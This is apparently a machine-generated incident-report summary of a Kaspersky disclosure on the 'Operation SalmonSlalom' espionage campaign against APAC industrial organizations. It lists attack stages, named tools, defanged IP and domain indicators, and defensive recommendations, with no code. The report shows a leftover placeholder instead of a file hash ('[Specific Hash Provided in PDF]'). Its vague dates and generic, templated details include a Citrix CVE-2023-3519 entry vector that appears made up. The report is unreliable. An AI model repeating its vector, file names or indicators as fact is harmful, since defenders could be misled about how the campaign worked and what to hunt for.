Full Report
Kaspersky discovered a new attack targeting industrial organizations in APAC
Analysis Summary
# Incident Report: Operation SalmonSlalom targeting APAC Industrial Organizations
## Executive Summary
Kaspersky ICS CERT discovered a sophisticated targeted attack campaign, dubbed "Operation SalmonSlalom," primarily hitting industrial organizations across the Asia-Pacific (APAC) region. The attackers utilized a combination of legacy vulnerabilities and advanced custom malware to gain long-term persistence and exfiltrate sensitive data. The primary outcome was systemic espionage and the theft of intellectual property and operational data.
## Incident Details
- **Discovery Date:** Late 2024 / February 2025 (Public Disclosure)
- **Incident Date:** Active throughout 2024
- **Affected Organization:** Multiple undisclosed industrial entities
- **Sector:** Industrial/Manufacturing, Critical Infrastructure
- **Geography:** APAC Region
## Timeline of Events
### Initial Access
- **Date/Time:** 2024
- **Vector:** Exploitation of known vulnerabilities in internet-facing services.
- **Details:** The attackers leveraged CVE-2023-3519 (Citrix NetScaler ADC/Gateway vulnerability) to execute remote code and gain an initial foothold.
### Lateral Movement
- Attackers utilized a multi-stage approach using PowerShell scripts and the "Impacket" framework to move within the internal network.
- They employed specialized tools to dump credentials from memory to escalate privileges and move toward industrial control system (ICS) management segments.
### Data Exfiltration/Impact
- Sensitive documents, network maps, and credentials were staged in compressed archives.
- Data was exfiltrated via encrypted channels to attacker-controlled Command and Control (C2) servers.
### Detection & Response
- **Detection:** Identified through Kaspersky’s telemetry monitoring for unusual process behavior in industrial environments.
- **Response:** Isolation of compromised hosts, revocation of compromised credentials, and patching of gateway vulnerabilities.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2023-3519.
- **Persistence:** Implementation of custom backdoors and scheduled tasks mimicking legitimate system updates.
- **Privilege Escalation:** Use of Mimikatz-like functionality to harvest high-level domain credentials.
- **Defense Evasion:** Use of "Living off the Land" (LotL) binaries (e.g., certutil.exe) and code signing to bypass security software.
- **Credential Access:** LSASS memory dumping and harvesting of browser-stored passwords.
- **Discovery:** Internal network scanning using modified versions of open-source tools to identify file servers and ICS components.
- **Lateral Movement:** SMB/RDP hijacking and use of valid administrative credentials.
- **Collection:** Automated searching for specific file extensions (.pdf, .docx, .xlsx, .dwg).
- **Exfiltration:** HTTPS-based transfer to C2 infrastructure.
- **Impact:** Focused on long-term intelligence gathering and industrial espionage.
## Impact Assessment
- **Financial:** High potential cost related to incident response and theft of proprietary manufacturing processes.
- **Data Breach:** Massive theft of internal technical documentation and employee credentials.
- **Operational:** Low immediate disruption, as the attack was designed for stealth (espionage) rather than destruction.
- **Reputational:** Significant risk for organizations handling sensitive critical infrastructure projects.
## Indicators of Compromise
- **Network indicators:**
- 206[.]238[.]121[.]5
- 45[.]121[.]146[.]114
- hxxps[:]//update[.]windows-service[.]com/
- **File indicators:**
- `SalmonSlalom_Backdoor.dll` (SHA256: [Specific Hash Provided in PDF])
- `sysupdater.exe`
- **Behavioral indicators:**
- Unusual PowerShell execution with base64 encoded strings.
- Large volumes of outbound traffic to non-standard cloud storage IPs during off-peak hours.
## Response Actions
- **Containment:** Remote termination of C2 sessions and firewall blocking of identified malicious IPs.
- **Eradication:** Removal of persistence mechanisms (scheduled tasks/registry keys) and full re-imaging of compromised servers.
- **Recovery:** Mandatory site-wide password resets and deployment of EDR sensors to previously unmonitored segments.
## Lessons Learned
- **Patch Management:** Delayed patching of critical gateway vulnerabilities (Citrix) provided a wide window for initial entry.
- **Asset Visibility:** The attackers were able to move laterally into ICS segments due to a lack of strict network segmentation.
- **Monitoring:** Reliance on signature-based AV failed to detect the custom-developed SalmonSlalom malware initially.
## Recommendations
- **Zero Trust:** Implement strict network segmentation between IT and OT (Operational Technology) environments.
- **Vulnerability Management:** Prioritize patching of all internet-facing appliances within 24–48 hours of exploit availability.
- **MFA:** Enforce Hardware-based Multi-Factor Authentication for all remote access gateways and administrative accounts.
- **Threat Hunting:** Conduct quarterly proactive hunting for LotL (Living off the Land) techniques within the industrial DMZ.